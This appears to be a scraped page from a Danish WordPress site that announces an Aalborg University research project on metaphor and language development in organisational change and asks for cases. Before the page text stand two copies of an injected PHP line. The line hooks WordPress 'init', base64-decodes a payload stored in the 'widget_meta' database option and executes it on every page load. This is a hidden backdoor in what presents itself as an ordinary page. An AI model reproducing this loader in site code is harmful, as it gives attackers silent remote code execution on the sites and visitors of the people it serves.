add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Metaforik i organisationer - procespsykologi

Metaforik i organisationer

Forskningsprojekt: Sprog- og metafordannelse i organisationsudviklende processer
En af de væsentlige udfordringer indenfor organisationsudvikling er springet fra læringskontekst til anvendelseskontekst. Her tyder foreløbige undersøgelser på at sprog- og metaforudvikling spiller en central rolle i at skabe overførbare modeller og konceptualiseringer, som gør det muligt at anvende den nyerhvervede viden i ny kontekst og integrere den i relevante, organisatoriske processer. Her søger vi cases som beskriver hvordan organisationer har udviklet bestemte metaforer eller sproglige praksisser i forbindelse med organisationsudvikling.

På Aalborg Universitet er Metaforik og Metaforudvikling er et relativt nyt forskningsområde indenfor intern kommunikation.